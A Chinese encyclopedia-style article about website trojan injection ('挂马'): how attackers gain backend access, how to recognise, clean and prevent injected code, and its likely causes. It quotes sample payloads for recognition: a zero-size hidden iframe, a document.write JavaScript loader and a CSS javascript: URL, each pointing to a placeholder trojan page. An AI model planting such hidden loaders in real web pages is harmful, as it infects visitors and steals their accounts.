所谓的挂马,就是黑客通过各种手段,包括SQL注入,网站敏感档案扫描,伺服器漏洞,网站程式0day, 等各种方法获得网站管理员账号,然后登入网站后台,通过资料库“备份/恢复”或者上传漏洞获得一个webshell。利用获得的webshell修改网站页面的内容,向页面中加入恶意转向代码。也可以直接通过弱口令获得伺服器或者网站FTP,然后直接对网站页面直接进行修改。当你访问被加入恶意代码的页面时,你就会自动的访问被转向的地址或者下载木马病毒。
基本介绍
- 中文名:挂马
- 手段:SQL注入等
- 目的:加入恶意转向代码
- 危害:窃取隐私或资料
- 措施:定期对网站进行安全的检测等
- 分类:网站代码、入侵导致、病毒导致
基本信息
名词解释
所谓的挂马,就是黑客通过各种手段,包括SQL注入,网站敏感档案扫描,伺服器漏洞,网站程式0day, 等各种方法获得网站管理员账号,然后登入网站后台,通过资料库 备份/恢复 或者上传漏洞获得一个webshell。利用获得的webshell修改网站页面的内容,向页面中加入恶意转向代码。也可以直接通过弱口令获得伺服器或者网站FTP,然后直接对网站页面直接进行修改。当你访问被加入恶意代码的页面时,你就会自动的访问被转向的地址或者下载木马病毒。
危害
很多游戏网站被挂马,黑客目的就是盗取浏览该网站玩家的游戏账号,而那些大型网站被挂马,则是为了蒐集大量的肉鸡。网站被挂马不仅会让自己的网站失去信誉,丢失大量客户,也会让我们这些普通用户陷入黑客设下的陷阱,沦为黑客的肉鸡。
如果不小心进入了已被挂马的网站,则会感染木马病毒,以致丢失大量的宝贵档案资料和账号密码,其危害极大。
分辨
其实我们说的所谓的挂马一般就是在那些可编辑档案下或是头部加入一段代码来实现跳转到别的网站访问那个他们指定的HTML网页木马的然后通过你电脑本身的漏洞攻破你的系统给你下载一个下载者,然后那下载者设定多少时间后开始在指定地点隐藏下载木马并运行!所以说我们只要把那段代码给清理掉了就达到了清理挂马的作用了!所以我们首先要辨别是不是自己的站是不是被挂马!你如果打开网站发现很卡但是防毒软体没报警别以为没事了,很多马很有可能做了免杀处理所以杀软没反映!我们打开网站点查看原始码如果顶部或是底下出现了这样的代码就恭喜你中标了!比如:
<iframe src=http: //www.baidu/muma.html width=0 height=0></iframe>
我想学做站的人都知道这行代码的意思吧?就是插入一个长和高都是0框架运行
http: //www.baidu/muma.html这个页面!但是因为框架的长和高都是零你就没办法看到那个视窗了!但是如果你没在顶部和底部发现这些代码就以为没事了,有的人还会在中间插入,只是在底部和顶部绝对不会影响到网站的整体结构不用想那幺多!但是如果那个挂马的哥们稍微耐心一点多测试一下在网站代码的中间还是很容易的!所以如果你代码太多嫌找着麻烦的话你就可以直接在IE浏览器里点查看--隐私里看到底有没有外连到别的站上去的站!有的话那很有可能被挂马了!(PS:如果你的站採集了的别人的图片的话在隐私里会有连到别人那的喔,或是统计代码也是,所以这要自己分析,哪些是正常的,哪些不是)!有的童鞋可能会说你这人真笨怎幺不知道在源档案里直接查找<iframe这个呢!这样快多了,但是我想说的是不是所有人都是用插入框架的方法挂马的,方法可是有很多的喔,我就给大家列举一下比如:
1 、js档案挂马
首先将以下代码
document.write("<iframe width='0' height='0'
src='http //www.baidu/muma.htm'></iframe>");
保存为xxx.js,
则JS挂马代码为
<script language=javascript src=xxx.js></script>
2、css中挂马
body {
background-image: url('javascript:document.write("<script
src=http: //www.baidu/muma.js></script>")')}
恢复
恢复措施:1.整站被挂马,最快速的恢複方法是,除开资料库、上传目录之外,替换掉其他所有档案;
2.仔细检查网站上传目录存放的档案,很多木马伪装成图片保存在上传目录,你直接把上传资料夹下载到本地,用缩略图的形式,查看是不是图片,如果不显示,则一律删除;
3.资料库里面存在木马,则把资料库的木马代码清除!可以採用查找替换;
4.如果网站源档案没有,则需要FTP下载网站档案,然后再DW里面,用替换清除的方式一个个清除,注意网站的木马数,如果被挂了很多不同的,必须多多检查!
预防
措施 :
1、建议用户通过ftp来上传、维护网页,儘量不安装asp的上传程式。
2、对asp上传程式的调用一定要进行身份认证,并只允许信任的人使用上传程式。
这其中包括各种新闻发布、商城及论坛程式,只要可以上传档案的asp都要进行身份认证!
3、asp程式管理员的用户名和密码要有一定複杂性,不能过于简单,还要注意定期更换。
4、到正规网站下载asp程式,下载后要对其资料库名称和存放路径进行修改,资料库档案名称称也要有一定複杂性。
5、要儘量保持程式是最新版本。
6、不要在网页上加注后台管理程式登入页面的连结。
7、为防止程式有未知漏洞,可以在维护后删除后台管理程式的登入页面,下次维护时再通过ftp上传即可。
8、要时常备份资料库等重要档案。
9、日常要多维护,并注意空间中是否有来历不明的asp档案。记住:一分汗水,换一分安全!
10、一旦发现被入侵,除非自己能识别出所有木马档案,否则要删除所有档案。
11、定期对网站进行安全的检测,具体可以利用网上一些工具,如亿思网站安全检测平台。
原因分析
简述
一般来说,伺服器或者网站被植入病毒代码有以下三种原因:网站代码、入侵导致、病毒导致
网站代码
如果伺服器上大部分用户的网站都正常,只有少量用户网站被黑,那幺就很可能是少量用户网站被黑的网站代码有问题,存在安全漏洞造成的。造成这个问题是没有办法解决,也不是服务商的责任。
大家都知道,“虚拟主机提供商”对自己的每个虚拟主机用户都分配了FSO档案操作的许可权,他们通过您分配的合法许可权,可以任意改动和上传的任何档案。如果用户没有保护好您分配给他们的合法许可权,令黑客有机可乘,那幺,黑客就可以利用合法许可权对网站进行破坏了,但是大部分用户都认为这个黑客入侵不是他自己造成的,是服务商造成的,这实际上是冤枉了服务商。
入侵导致
当伺服器上所有网站都被植入了病毒代码,并且可以在源档案的尾部或头部找到病毒代码档案,或者在IIS里面被植入了添加脚本,就标明是由于伺服器被入侵导致的。
病毒导致
当伺服器上所有网站都被植入了病毒代码,并且在源档案的尾部或头部无法找到病毒代码档案,就表明伺服器所在的机房中了ARP病毒。这时需要联繫我们来解决,一般情况下,机房会有大量伺服器中毒,会有很多客户向机房反应,一般在半小时内机房就会处理的。
